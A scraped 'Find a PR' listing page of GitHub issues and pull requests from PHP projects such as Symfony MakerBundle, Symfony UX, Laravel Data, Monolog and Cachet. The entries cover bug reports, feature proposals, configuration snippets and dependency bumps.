Found 732 issues

First time here? 👋

Welcome to Find a PR.

Find a PR is an open-source site that is built to help developers find projects so that they can submit their very first pull request.

If you're a contributor looking to find a project to contribute to, feel free to browse through the list below.

If you're a maintainer looking to list your project on Find a PR, you can read how to do this in the documentation.

Problem

When creating a controller with make:controller or a crud with make:crud or a registration form with make:registration-form or a password reset system with make:reset-password or a form login system with make:security:form-login, at the following question:

Do you want to generate PHPUnit tests? [Experimental] (yes/no) [no]:

If we don't have PHPUnit installed, we get the following error:

In KernelTestCase.php line 25:

  Attempted to load class "TestCase" from namespace "PHPUnit\Framework".  
  Did you forget a "use" statement for another namespace?

→ It throws an error and creates neither the controller nor the tests.

Steps to reproduce

  1. Do not have PHPUnit installed

  2. Create a controller with the maker bundle:

    php bin/console make:controller
    
  3. Answer “yes” to the following question:

    Do you want to generate PHPUnit tests? [Experimental] (yes/no) [no]:
    > yes
    
  4. Get the following error:

    In KernelTestCase.php line 25:
    
      Attempted to load class "TestCase" from namespace "PHPUnit\Framework".  
      Did you forget a "use" statement for another namespace?
    

Screenshots

Image

Image

Image

Image

Image

Versions

Symfony 7.3.1 Symfony MakerBundle 1.64.0

composer.json:

{
    "type": "project",
    "license": "proprietary",
    "minimum-stability": "stable",
    "prefer-stable": true,
    "require": {
        "php": ">=8.2",
        "ext-ctype": "*",
        "ext-iconv": "*",
        "symfony/console": "7.3.*",
        "symfony/dotenv": "7.3.*",
        "symfony/flex": "^2",
        "symfony/framework-bundle": "7.3.*",
        "symfony/runtime": "7.3.*",
        "symfony/yaml": "7.3.*"
    },
    "require-dev": {
        "symfony/maker-bundle": "^1.64"
    },
    "config": {
        "allow-plugins": {
            "php-http/discovery": true,
            "symfony/flex": true,
            "symfony/runtime": true
        },
        "bump-after-update": true,
        "sort-packages": true
    },
    "autoload": {
        "psr-4": {
            "App\\": "src/"
        }
    },
    "autoload-dev": {
        "psr-4": {
            "App\\Tests\\": "tests/"
        }
    },
    "replace": {
        "symfony/polyfill-ctype": "*",
        "symfony/polyfill-iconv": "*",
        "symfony/polyfill-php72": "*",
        "symfony/polyfill-php73": "*",
        "symfony/polyfill-php74": "*",
        "symfony/polyfill-php80": "*",
        "symfony/polyfill-php81": "*",
        "symfony/polyfill-php82": "*"
    },
    "scripts": {
        "auto-scripts": {
            "cache:clear": "symfony-cmd",
            "assets:install %PUBLIC_DIR%": "symfony-cmd"
        },
        "post-install-cmd": [
            "@auto-scripts"
        ],
        "post-update-cmd": [
            "@auto-scripts"
        ]
    },
    "conflict": {
        "symfony/symfony": "*"
    },
    "extra": {
        "symfony": {
            "allow-contrib": false,
            "require": "7.3.*"
        }
    }
}

composer show symfony/maker-bundle:

name     : symfony/maker-bundle
descrip. : Symfony Maker helps you create empty commands, controllers, form classes, tests and more so you can forget about writing boilerplate code.
keywords : code generator, dev, generator, scaffold, scaffolding
versions : * v1.64.0
released : 2025-06-23, 2 weeks ago
type     : symfony-bundle
license  : MIT License (MIT) (OSI approved) https://spdx.org/licenses/MIT.html#licenseText
homepage : https://symfony.com/doc/current/bundles/SymfonyMakerBundle/index.html
source   : [git] https://github.com/symfony/maker-bundle.git c86da84640b0586e92aee2b276ee3638ef2f425a
dist     : [zip] https://api.github.com/repos/symfony/maker-bundle/zipball/c86da84640b0586e92aee2b276ee3638ef2f425a c86da84640b0586e92aee2b276ee3638ef2f425a
names    : symfony/maker-bundle

support
issues : https://github.com/symfony/maker-bundle/issues
source : https://github.com/symfony/maker-bundle/tree/v1.64.0

autoload
psr-4
Symfony\Bundle\MakerBundle\ => src/

requires
doctrine/inflector ^2.0
nikic/php-parser ^5.0
php >=8.1
symfony/config ^6.4|^7.0
symfony/console ^6.4|^7.0
symfony/dependency-injection ^6.4|^7.0
symfony/deprecation-contracts ^2.2|^3
symfony/filesystem ^6.4|^7.0
symfony/finder ^6.4|^7.0
symfony/framework-bundle ^6.4|^7.0
symfony/http-kernel ^6.4|^7.0
symfony/process ^6.4|^7.0

requires (dev)
composer/semver ^3.0
doctrine/doctrine-bundle ^2.5.0
doctrine/orm ^2.15|^3
symfony/http-client ^6.4|^7.0
symfony/phpunit-bridge ^6.4.1|^7.0
symfony/security-core ^6.4|^7.0
symfony/security-http ^6.4|^7.0
symfony/yaml ^6.4|^7.0
twig/twig ^3.0|^4.x-dev

conflicts
doctrine/doctrine-bundle <2.10
doctrine/orm <2.15

composer/lock:

{
      "name": "symfony/maker-bundle",
      "version": "v1.64.0",
}

Related versions / commits / PRs

Release v1.59.0 PR https://github.com/symfony/maker-bundle/pull/1497

View more
Maxcastel

Maxcastel

14th Jul 2025 @ 14:04

This is just a nitpick, but has DX impact.

The recipe's mainfest.json can state the instruction to create the placeholder folders (similarly to dockerfile/docker-compose configurations).

Having empty committed .gitignore files or having to delete them each time the recipe is reinstalled is not the best DX.

View more
kaznovac

kaznovac

29th May 2024 @ 08:17

Adds the standard responsive viewport meta tag to the base.html.twig provided by TwigBundle recipes across supported versions. This aligns the default scaffold with common HTML5 boilerplates and improves out-of-the-box rendering on mobile devices, without changing template structure or behavior otherwise.

View more
3 comments
AdemIY

AdemIY

7th Feb 2026 @ 22:04

Q A
Branch? 3.x
Bug fix? no
New feature? yes
Deprecations? no (not yet)
Issues Fix #558
License MIT

This is a partial PR to gather feedbacks.

  • Each Monolog handler has its own configuration and extension class
  • Some handlers can share the same with different properties (name, handler class)
  • They are all registered in the MonologExtension
  • 3rd party bundles can add their own handler extension classes
View more
2 comments 👍 1
GromNaN

GromNaN

26th Nov 2025 @ 09:28

Platform Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Docs? no
Issues -
License MIT

Automated refresh of the bridge ModelCatalog static lists from upstream metadata (models.dev for per-provider bridges, the OpenRouter API for OpenRouter).

New models are appended; hand-curated entries are left untouched. Review the diff before merging, and adjust capabilities or model classes where the heuristics need a human.

View more
github-actions[bot]

github-actions[bot]

13th Jul 2026 @ 07:04

This PR adds support for additional parameters to the native mailer, as describe in https://www.php.net/manual/en/function.mail.php

The additional_params parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.

In a recent project we had the requirement to set the additional parameter [email protected] to be able to send emails through a relay server. Otherwise the mails were bounced.

The bundle currently allows to set these parameters only on existing logger instances. This PR allows to set them in the configuration file:

native_mailer:
    type: native_mailer
    from_email: '[email protected]'
    to_email: '[email protected]'
    subject: 'Example subject'
    parameters:
        - '[email protected]'
View more
nkl-kst

nkl-kst

31st Oct 2023 @ 11:13

✏️ Describe the bug When a Data object contains a keyed collection (array<string, ChildData> / DataCollection) and the array keys themselves contain literal dots, validation via validateAndCreate() (or request/validate()) fails. The array key is treated as a nested path separator, so the validator looks for the value at the wrong location and reports the fields as missing.

Plain creation with from() is not affected. It looks like defining an empty rules() function also resolves the issue. Looks like #1043 introduced the regression.

↪️ To Reproduce

it('will validate a keyed collection whose keys contain dots', function () {
    $dataClass = new class () extends Data {
        /** @var array<string, SimpleData> */
        #[DataCollectionOf(SimpleData::class)]
        public array $items;
    };

    DataValidationAsserter::for($dataClass)
        ->assertOk([
            'items' => [
                'key.with.dots' => ['string' => 'first'],
                'another.key' => ['string' => 'second'],
            ],
        ])
        ->assertErrors([
            'items' => [
                'key.with.dots' => ['other_string' => 'wrong key'],
            ],
        ])
        ->assertRules([
            'items' => ['present', 'array'],
            'items.key\.with\.dots.string' => ['required', 'string'],
        ], payload: [
            'items' => [
                'key.with.dots' => [],
            ],
        ]);
});

✅ Expected behavior Validating keys containing dots should be resolved correctly 🖥️ Versions

Laravel: 12 Laravel Data: 4.18.0+ PHP: 8.4

View more
ropi-bc

ropi-bc

6th Jul 2026 @ 09:57

The current implementation of RSS is very barebones (still happy that it exists!).

Problem

Right now if there is an update added to an incident the RSS feed will not be notified to reflect that.

Solution

As per the RSS 2.0 spec, you can create an "updated" RSS functionality by changing the guid (as per the spec here).

Contributing

I am willing to make a pull request with the desired functionality.

I am still between the solution of creating "perminant" items or "impermanent"; meaning if the rss file contains all the items (for all the incidents and its updates one seperate item) or just the incident, and when an update is created we just update the item with a new guid. (the rss file returned only contains the incident with the information in the details)

I have created a fork with the second option implemented in a separate branch

Blocking?

I might want to wait on #256 so the notifications are not wrong (incident on new status while update on old status)

View more
dj-tuxis

dj-tuxis

26th May 2025 @ 10:14

Fixes #1019.

This prevents mapped input properties from falling back to the original PHP property name when validated creation is being used. Without this, an input like ['size' => 300] can bypass validation rules defined for the mapped input name page.size and still hydrate the property.

The change only removes the unmapped original property during validation-backed creation, so existing unvalidated from() behavior continues to accept the original property name.

Tests run:

  • php vendor/bin/php-cs-fixer fix --dry-run --diff --allow-risky=yes --config=.php-cs-fixer.dist.php src/DataPipes/MapPropertiesDataPipe.php tests/ValidationTest.php
  • php vendor/bin/phpstan analyse src/DataPipes/MapPropertiesDataPipe.php --memory-limit=1G
  • php vendor/bin/pest tests/ValidationTest.php --filter "original property names" --no-coverage
  • php vendor/bin/pest tests/MappingTest.php --no-coverage

Not run: full tests/ValidationTest.php on my Windows/PHP 8.3 setup, because it hits an unrelated phpDocumentor FQSEN parsing issue in it can overwrite collection item rules with wildcard rules.

View more
1 comment
ibobgunardi

ibobgunardi

3rd Jun 2026 @ 00:12

Q A
Issues Companion to symfony/ux#3487
License MIT

Companion PR to symfony/ux#3468. Adds the Toolkit/Shadcn docs page for the popover recipe.

Kept as draft until symfony/ux#3468 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
1 comment
Amoifr

Amoifr

18th Apr 2026 @ 14:20

This PR documents the new route-specific CORS support so developers can configure cross-origin policies where routes are defined instead of relying only on global configuration.

Framework PR: https://github.com/laravel/framework/pull/59305

Usage

The docs now cover route-level ->cors([...]) usage, route group inheritance, and the #[Cors] attribute on controller classes and methods.

Approach

  • Extend the routing documentation's CORS section with the new per-route configuration workflow.
  • Show the supported options and explain precedence between route, group, class, and method definitions.
  • Note that route-specific CORS metadata continues to work with route caching.
View more
WendellAdriel

WendellAdriel

20th Mar 2026 @ 19:21

enhancement pending review

Summary

Adds an emptyState() method to Stat, letting you define a fallback value/content to render when a stat's value resolves to null.

Stat::make('Unique views', $uniqueViews)
    ->emptyState('-')

The blade view now does:

{{ $getValue() ?? $getEmptyState() }}

Why not just handle this with value()?

You can already get the same visual result today without this PR, just by doing the null-coalescing yourself:

Stat::make('Unique views', null)
    ->value($uniqueViews ?? '-')

That works, but it means every stat needs this handled ad-hoc at the call site. Adding a dedicated emptyState() method:

  • separates "what the value is" from "what to show when there's no value," which reads more clearly
  • can be configured globally via Stat::configureUsing(), so an app can set one default empty-state placeholder (e.g. '-' or 'N/A') for every stat without repeating ?? '-' everywhere
use Filament\Widgets\StatsOverviewWidget\Stat;

Stat::configureUsing(function (Stat $stat): void {
    $stat->emptyState('-');
});

That global-default use case isn't really reachable with the manual value($x ?? '-') approach, since it has to be repeated per-stat rather than configured once.

View more
1 comment
ahmed-rashad-alnaggar

ahmed-rashad-alnaggar

13th Jul 2026 @ 19:40

Adding cachet to a container registry like ghcr.io would massively simplify deployment on various platforms. If updates to the container registry image were uploaded mutually with new releases, it would further improve the deployment process.

I can see on dockerhub the last image was uploaded 3 years ago

View more
3 comments 👍 1
nxfi777

nxfi777

14th Mar 2024 @ 17:24

Problem

MakeQueueTenantAwareAction::isTenantAware() reads $payload['data']['command'] unconditionally. Modern Laravel payloads always carry the serialized job there, but legacy string-job payloads have no data.command:

{ "job": "App\\Jobs\\SyncInventory@handle", "data": { "sku": "ABC-123" } }

This shape is produced whenever messages reach the queue from something other than Laravel's dispatcher — e.g. AWS EventBridge input transformers pushing to SQS, or any raw Queue::pushRaw-style producer. Laravel's worker still runs them via $instance->handle($job, $data), and fires JobProcessing as usual.

Because data.command is absent, the action throws Undefined array key "command" before it ever reaches the interface checks. So a legacy-format job that implements NotTenantAware (or TenantAware) has its declaration silently ignored, and the worker errors instead of processing the job.

Fix

When data.command is absent, resolve the job class straight from payload['job'] (stripping the @method suffix) and run the existing interface / config-list / default checks against that class name (ReflectionClass accepts a class-string). The decision logic is extracted into a shared helper so both paths behave identically.

  • Honors all the same config knobs: tenant_aware_interface, not_tenant_aware_interface, tenant_aware_jobs, not_tenant_aware_jobs, queues_are_tenant_aware_by_default.
  • If the class can't be resolved (missing job key, or class doesn't exist) it falls back to queues_are_tenant_aware_by_default — it never throws.
  • The legacy path has nothing to unserialize and no encrypted command, so no decryption/unserialization is attempted there.

Zero impact on modern payloads

Modern Queueable jobs always carry data.command (the real job is serialized inside it; the top-level job is Illuminate\Queue\CallQueuedHandler@call, not the job class). The new branch triggers only when data.command is genuinely absent, so the modern path is unchanged — the added risk surface is limited to payloads that currently crash. A regression test asserts this and fails if the legacy branch is ever allowed to touch a modern payload.

Tests

New LegacyQueuePayloadTest covering: legacy NotTenantAware → false; legacy TenantAware → true; legacy class in tenant_aware_jobs / not_tenant_aware_jobs → respective result; unresolvable/missing class → falls back to the default (both true and false); missing job key → default; a modern data.command payload behaves exactly as before; and an end-to-end regression firing JobProcessing for a legacy payload no longer throws.

View more
ragulka

ragulka

8th Jul 2026 @ 08:56

when adding symfony/joli-notif-notifier to a project, the env var is commented out.

 composer req symfony/joli-notif-notifier
cat .env

###> symfony/joli-notif-notifier ###
# JOLINOTIF_DSN=jolinotif://default
###< symfony/joli-notif-notifier ###

I can't find anything in the recipe that does this, and I don't understand why anyone would want to, since it's an extra step the first time you try to use it.

View more
2 comments
tacman

tacman

22nd May 2025 @ 15:02

If the Mercure hub is located on a completely different domain from the one where the front-end is hosted, then authorizing with the hub using cookies doesn't work (AFAIK). Using Authorization header doesn't work with the browser's native EventSource. This leaves adding an authorization parameter to the hub query.

I propose adding a Twig extension to generate a hub URL, similar to the existing mercure() function, but adding an authorization param to the query.

View more
wooky

wooky

3rd Mar 2023 @ 03:32

I have a Dockerfile like the following in order to re-build the application in 2.4 and apply some CSS changes

>cat Dockerfile 
# build stage
FROM cachethq/docker:latest
COPY public/img/login-logo.png /var/www/html/public/img/login-logo.png
COPY resources /var/www/html/resources
USER root
RUN apk add --no-cache npm
USER 1001
RUN mkdir -p /home/www-data/.npm/ && cd /var/www/html && npm install && npm run production

# docker stage
FROM cachethq/docker:latest
RUN rm -fr /var/www/html
COPY --from=0 --chown=1001 /var/www/html /var/www/html
COPY entrypoint.sh /sbin/entrypoint.sh
USER root
RUN apk add --no-cache vim
USER 1001

Lately I have noticed that uglify-js is giving this error.

 DONE  Compiled successfully in 30631ms                                                                                        11:59:51 AM

Whoops! We had trouble minifying "public/dist/js/all.js". Perhaps you need to use mix.babel() instead?

/var/www/html/node_modules/laravel-mix/src/webpackPlugins/CustomTasksPlugin.js:64
                    throw e;
                    ^
SyntaxError: Name expected
    at JS_Parse_Error.get (eval at <anonymous> (/var/www/html/node_modules/uglify-js/tools/node.js:27:1), <anonymous>:86:23)
npm ERR! code ELIFECYCLE
npm ERR! errno 1
npm ERR! cachet@ production: `cross-env NODE_ENV=production node_modules/webpack/bin/webpack.js --progress --hide-modules --config=node_modules/laravel-mix/setup/webpack.config.js`
npm ERR! Exit status 1
npm ERR! 
npm ERR! Failed at the cachet@ production script.
npm ERR! This is probably not a problem with npm. There is likely additional logging output above.

npm ERR! A complete log of this run can be found in:
npm ERR!     /home/www-data/.npm/_logs/2020-12-22T11_59_51_992Z-debug.log

When I build the image using an older docker image from a previous build from my docker registry, that has node_modules already installed, then the build succeeds. I have verified that the uglify-js is in the same version in both images.

bash-5.0$ npm list uglify-js
cachet@ /var/www/html
`-- [email protected]
  +-- [email protected]
  | `-- [email protected]
  |   `-- [email protected] 
  +-- [email protected] 
  `-- [email protected]
    `-- [email protected]
      `-- [email protected]  deduped

However, if I diff the two folders (the one created in a new npm install, and the one that was installed in an older image) the actual files differ. So, as a workaround, after npm install I am replacing the node_modules/uglify-js from an older image to the node_modules and the npm run production works without any issues and this was my workaround to the problem.

View more
christidis

christidis

22nd Dec 2020 @ 12:46

✏️ Describe the bug After upgrading the package to the latest version I started getting validation errors I feel are unexpected. I tried numerous versions of laravel-data and have isolated this to changes introduced in 4.22.0.

For example, take this class definition:

abstract class BaseExampleData extends Data implements PropertyMorphableData
{
    public function __construct(
        #[PropertyForMorph]
        public string $type,
        public bool $example_bool = true,
    ) {}

    public static function morph(array $properties): ?string
    {
        return match ($properties['type']) {
            'failing' => FailingExampleData::class,
            'working' => WorkingFailingExampleData::class,
            default => null,
        };
    }
}

class FailingExampleData extends BaseExampleData
{
    public function __construct(
        bool $example_bool = true,
    ) {
        parent::__construct(
            type: 'failing',
            example_bool: $example_bool,
        );
    }
}

In versions of laravel-data < 4.22.0 you could run this code without any validation error:

FailingExampleData::validate(['type' => 'failing']);

This feels like expected behaviour because the parent class defines a default for the example_bool property.

From laravel-data version 4.22.0 and onwards this will start throwing a validation exception saying that example_bool is required.

Interestingly, this alternative definition of the child class (with public in constructor - again even though it's defined on the parent) does work:

class WorkingFailingExampleData extends BaseExampleData
{
    public function __construct(
        public bool $example_bool = true,
    ) {
        parent::__construct(
            type: 'working',
            example_bool: $example_bool,
        );
    }
}

I checked to see if laravel-data recognises the default values:

$failingDataClass = app(DataConfig::class)->getDataClass(FailingExampleData::class);
dump($failingDataClass->properties['example_bool']->hasDefaultValue);

$workingDataClass = app(DataConfig::class)->getDataClass(WorkingFailingExampleData::class);
dump($workingDataClass->properties['example_bool']->hasDefaultValue);

This is actually the same result false then true, for laravel-data versions both before and after that version.

I had a quick look and it seems like when \Spatie\LaravelData\Support\DataClass is built it only checks the classes constructor. I'm not sure if it makes sense to see to check the parent class as well, but this could get complex quickly. E.g. How many parents do you check? Do you need to consider the default value changing from subsequent parent::__construct calls?

So I'm not really sure what to do here. I can change my data class definitions, but it feels like something that should work and will be very easy to miss/forget in the future when creating more data classes.

✅ Expected behavior I should be able to define a public property with a default value in the constructor of an abstract class. Any classes that extend it should know there's a default value and avoid triggering required validation errors for it.

🖥️ Versions

Laravel: 12.48.1 Laravel Data: Tested with versions from 4.19.0 onward PHP: 8.5.2

View more
2 comments
bentleyo

bentleyo

28th May 2026 @ 00:53

We want to use the TagProcessor from Monolog. How can we configure the Tags in the yaml config file?

View more
mimmi20

mimmi20

9th Dec 2025 @ 12:45

Hi,

The following configuration can't be used in a Docker context. I need to specify 0.0.0.0 as the host for the built-in PHP server, and use the PHP container name as the $baseUri.".

$client = Client::createPantherClient(
    options: [
        'hostname': '0.0.0.0' 
        'browser' => PantherTestCase::SELENIUM,
    ],
    managerOptions: [
        'host' => 'http://selenium-hub:4444', // the host of the Selenium Server (Grid)
        'capabilities' => DesiredCapabilities::firefox(), // the capabilities of the browser
    ],
);

Would it be possible to add a new base_uri option to separate the server binding and the base URI configuration?

Currently, I need to do something like this :


static::startWebServer(['hostname' => '0.0.0.0', 'port' => 9080]);
self::$baseUri = 'http://my_container_php:9080';
$client = static::createPantherClient(
    options: [
        'browser' => PantherTestCase::SELENIUM,
    ],
    managerOptions: [
        'host' => 'http://selenium:4444/wd/hub', // the host of the Selenium Server (Grid)
        'capabilities' => DesiredCapabilities::chrome(), // the capabilities of the browser
    ],
);

View more
👍 1
adpeyre

adpeyre

23rd May 2025 @ 15:13

help wanted

What about allowing displaying post-install messages again, eg when running this?

composer recipes the/package

View more
nicolas-grekas

nicolas-grekas

1st Jun 2022 @ 09:13

dependencies

Bumps actions/checkout from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

22nd Jun 2026 @ 18:23

Documentation Status: Reviewed Feature LiveComponent
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues #
License MIT

Preview

Description:

Currently, LiveComponent actions triggered via data-action="live#action" execute synchronously and bypass standard confirmation dialogs. If developers configure a global async dialog (like SweetAlert2) via Turbo.config.forms.confirm (or Turbo.setConfirmMethod), it is completely ignored on LiveComponent actions. Additionally, native onclick="return confirm('...')" correctly prevents the event's default behavior, but the live#action was still being fired because event.defaultPrevented wasn't being checked before execution.

This PR introduces robust, framework-agnostic support for action confirmations, bridging the gap between LiveComponent, Hotwired Turbo, and custom async modal libraries.

What changed?

  1. Respect event.defaultPrevented: Added an early return in action() if the event was already canceled (e.g., via a native onclick="return confirm('...')").
  2. Asynchronous actions: Refactored the action(event) method to async and cached event.currentTarget to ensure scope and element references remain intact across the asynchronous boundary (await).
  3. Turbo native integration (data-turbo-confirm): Seamlessly integrates with Turbo 7 and Turbo 8 globally configured confirm methods. We strictly type-cast the integration locally inside the method to avoid polluting the global Window object and prevent type collisions for developers using their own @hotwired/turbo types.
  4. Framework-agnostic data-live-confirm: Introduced a new data-live-confirm attribute for developers who do not use Turbo. It dispatches a cancelable live:confirm custom event, allowing easy interception to hook up custom UI modals like SweetAlert2.
  5. Documentation: Added clear examples in doc/index.rst on how to use Native Confirm, Turbo Confirm, and Custom LiveConfirm (including a JS snippet showing SweetAlert2 integration and explicitly mentioning that any library or custom UI can be used).
  6. Demo Component: Added an interactive example (test.php & test.html.twig inside the confirm/ folder) to easily demonstrate and test all three confirmation strategies side-by-side using Bootstrap UI.

Backward Compatibility

This implementation is 100% backward-compatible. If no confirm attributes are present, the action executes synchronously just like before.

How to Test / Demo

You can check out the provided Demo component in the confirm/ directory. Simply render {{ component('test') }} in any application.

  • Native: Prompts standard browser dialog.
  • Turbo: Awaits the globally defined Turbo confirm promise.
  • Live: Dispatches a DOM event that you can intercept to open any async modal.

test.php

<?php

namespace App\Twig\Components;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\UX\LiveComponent\Attribute\AsLiveComponent;
use Symfony\UX\LiveComponent\Attribute\LiveAction;
use Symfony\UX\LiveComponent\Attribute\LiveProp;
use Symfony\UX\LiveComponent\DefaultActionTrait;

#[AsLiveComponent]
class test extends AbstractController
{
    use DefaultActionTrait;

    #[LiveProp(writable: true)]
    public string $nativeStatus = 'Waiting';

    #[LiveProp(writable: true)]
    public string $swalStatus = 'Waiting';

    #[LiveProp(writable: true)]
    public string $liveStatus = 'Waiting';

    #[LiveAction]
    public function deleteNative(): void
    {
        $this->nativeStatus = 'Confirmed';
    }

    #[LiveAction]
    public function deleteSweetAlert(): void
    {
        $this->swalStatus = 'Confirmed';
    }

    #[LiveAction]
    public function deleteLiveConfirm(): void
    {
        $this->liveStatus = 'Confirmed';
    }
}

test.html.twig

<div {{ attributes }}>
    <div class="container mt-5">
        <h2 class="mb-4 text-center">Interactive Confirm Examples</h2>
        <div class="row justify-content-center">
            {# Native Confirm #}
            <div class="col-md-4">
                <div class="card shadow-sm h-100">
                    <div class="card-body d-flex flex-column">
                        <h5 class="card-title text-primary">Native Confirm</h5>
                        <p class="card-text">Uses the browser's default confirm dialog via `onclick`.</p>
                        <hr>
                        <p><strong>Status:</strong>
                            <span class="badge {% if nativeStatus == 'Confirmed' %}bg-success{% else %}bg-secondary{% endif %}">
                                {{ nativeStatus }}
                            </span>
                        </p>
                        <button
                                data-action="live#action"
                                data-live-action-param="deleteNative"
                                onclick="return confirm('Are you sure you want to delete this item? (Native Confirm)')"
                                class="btn btn-danger w-100 mt-auto"
                        >
                            <i class="bi bi-trash"></i> Delete (Native)
                        </button>
                    </div>
                </div>
            </div>

            {# Turbo Confirm with SweetAlert2 #}
            <div class="col-md-4">
                <div class="card shadow-sm h-100">
                    <div class="card-body d-flex flex-column">
                        <h5 class="card-title text-success">Turbo setConfirmMethod</h5>
                        <p class="card-text">Uses `data-turbo-confirm` which is handled by `turbo:confirm-start` event.</p>
                        <hr>
                        <p><strong>Status:</strong>
                            <span class="badge {% if swalStatus == 'Confirmed' %}bg-success{% else %}bg-secondary{% endif %}">
                                {{ swalStatus }}
                            </span>
                        </p>
                        <button
                                data-action="live#action"
                                data-live-action-param="deleteSweetAlert"
                                data-turbo-confirm="Are you sure you want to delete this item? (setConfirmMethod)"
                                class="btn btn-success w-100 mt-auto"
                        >
                            <i class="bi bi-check-circle"></i> Delete (Turbo)
                        </button>
                    </div>
                </div>
            </div>

            {# Live Confirm with SweetAlert2 #}
            <div class="col-md-4">
                <div class="card shadow-sm h-100">
                    <div class="card-body d-flex flex-column">
                        <h5 class="card-title text-info">Live Confirm</h5>
                        <p class="card-text">Uses `data-live-confirm` which is handled by the Live Component system.</p>
                        <hr>
                        <p><strong>Status:</strong>
                            <span class="badge {% if liveStatus == 'Confirmed' %}bg-success{% else %}bg-secondary{% endif %}">
                                {{ liveStatus }}
                            </span>
                        </p>
                        <button
                                data-action="live#action"
                                data-live-action-param="deleteLiveConfirm"
                                data-live-confirm="Are you sure you want to delete this item? (Live Confirm)"
                                class="btn btn-info w-100 text-white mt-auto"
                        >
                            <i class="bi bi-bootstrap"></i> Delete (Live)
                        </button>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
View more
3 comments 👍 2
xDeSwa

xDeSwa

6th Jun 2026 @ 21:16

dependencies javascript

Bumps axios from 0.30.2 to 0.32.0.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
2 comments
dependabot[bot]

dependabot[bot]

30th May 2026 @ 05:47

I have checked here and the latest version as of now is 2.3.18. Is there a problem with releasing pre-built docker images?

View more
erfantkerfan

erfantkerfan

13th Jun 2024 @ 08:00

docker compose build fails with

failed to solve: process "/bin/sh -c wget ${archive_url} && tar xzf ${cachet_ver}.tar.gz --strip-components=1 && chown -R www-data:root /var/www/html && rm -r ${cachet_ver}.tar.gz && php /bin/composer.phar global require \"hirak/prestissimo:^0.3\" && php /bin/composer.phar install -o && rm -rf bootstrap/cache/*" did not complete successfully: exit code: 1

View more
2 comments
deanfourie1

deanfourie1

26th Oct 2025 @ 10:51

On a Symfony 7.3 project, I'm upgrading to 7.4RC3 via:

composer config minimum-stability rc
composer config extra.symfony.require "7.4.*"
composer update

I updated some Flex recipes and it all went good.

Then I run:

composer symfony:recipes:update symfony/phpunit-bridge

And my diff is:

On branch upgradeSymfony8
Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
	deleted:    .env.test
	deleted:    .gitignore
	deleted:    bin/phpunit
	modified:   phpunit.xml.dist
	modified:   symfony.lock
	deleted:    tests/bootstrap.php

Most of those files should not have disappeared, for example : .gitignore should not be removed.

How to reproduce

This was done on a open source project:

Checkout the branch, and run:

composer symfony:recipes:update symfony/phpunit-bridge

(you can use castor start && castor builder to have the project running via Docker and a shell to run the command).

Maybe related to https://github.com/symfony/recipes/pull/1401

View more
1 comment
damienalexandre

damienalexandre

26th Nov 2025 @ 10:11

dependencies

Updates the requirements on symfony/var-dumper to permit the latest version.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 06:06

RFC

Description

The ElevenLabs speech-to-text API supports exporting transcripts in additional formats, including SRT subtitles, through the additional_formats multipart field.

Currently, the Symfony AI ElevenLabs bridge supports Capability::SPEECH_TO_TEXT, but it is not possible to request SRT output cleanly through PlatformInterface::invoke(). The standard asText() result only exposes the plain transcript text, while the SRT content returned by ElevenLabs under additional_formats[0].content is not available through a first-class API.

This makes subtitle generation difficult when using Symfony AI with ElevenLabs Scribe.

Use case

I want to generate SubRip subtitles from an audio file using ElevenLabs Scribe v2 through Symfony AI:

$result = $platform->invoke(
    model: new ElevenLabs(
        name: 'scribe_v2',
        capabilities: [
            Capability::SPEECH_TO_TEXT,
            Capability::INPUT_AUDIO,
            Capability::OUTPUT_TEXT,
        ],
    ),
    input: Audio::fromFile(__DIR__ . '/audio.mp3'),
    options: [
        'language_code' => 'pl',
        'tag_audio_events' => false,
        'num_speakers' => 1,
        'diarize' => true,
        'timestamps_granularity' => 'word',
        'additional_formats' => [
            [
                'format' => 'srt',
                'include_timestamps' => true,
            ],
        ],
    ],
);

